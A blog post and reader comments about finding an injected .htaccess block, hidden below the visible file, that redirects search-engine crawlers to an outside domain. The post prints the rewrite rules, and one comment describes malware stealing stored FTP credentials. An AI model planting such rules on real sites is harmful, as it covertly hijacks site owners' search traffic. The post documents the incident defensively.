Got ’em

I found the hack.

Someone managed to change the .htaccess file on this site to add these three lines several screens below the rest of the file (so it didn't show up if you opened it in an editor):

RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://arbat.or.**/ [R=301,L]

…where the ** above were in fact the letters “at”.

That URL in turn redirects to a sub-page of a blog at

I've changed all my passwords to the site; now I think I'll give a couple of days and see if they come back before asking google to reconsider me again…

The reason it took me so long to find this is that I usually use the spider simulator to check what google sees. But I guess it wasn't a good enough emulator; only when I used the true google-bot in the webmaster tools did the problem reveal itself.

Of course I have no idea how they got in. But I did find similar code in other sites under the same user, none of which were production sites, so I just killed them. I'm hoping it was something in one of those that hadn't been updated quickly enough that caused the problem.

Earlier entries: That's Odd (7/6), Google Woes (8/3), and No Joy From Google (8/12)

This entry was posted in Bookmark the permalink.

3 Responses to Got ’em

  1. Jim Tyre says:

    Of course I have no idea how they got in.

    No doubt it was your brother when he was posting for you.

  2. 505 says:

    maybe it’s the pentagon messing with everybody who ever corresponded with julian assange

  3. Alec says:

    Good catch Michael.

    That would do it. One really has to be careful about site access and infected computers. There are also some programs to avoid. For example Total Commander on Windows stores all ftp information unencrypted and in a simple place to access on your hard drive. There are miniviruses which target these specific locations and send the simple ftp info back to the mothersbot which then proceeds with large scale and persistent html attacks on your site (mainly for links in the cases I’ve seen). Security of files can also be an issue if you are using a common keylogger (for instance to prevent loss of text when writing). With a keylogger, it’s slightly less of an issue though than Total Commander as Total Commander’s login file can be automatically parsed (no need for human intervention), while a keylogger’s file would need to be read and analyzed.

    The important thing is to maintain full backups so you can go back before the infection. Any post-infection site may be carrying eggs (i.e. unused exploits to regain access). Just because you’ve wiped out the primary symptom does not mean there is not a hidden backdoor to this site still online.

    That said, if you have wiped out the issue, Google should bring you back relatively quickly with partial inclusion within a couple of weeks and full inclusion/ranking inside two months.

    An interesting case study. Track your numbers.

Comments are closed.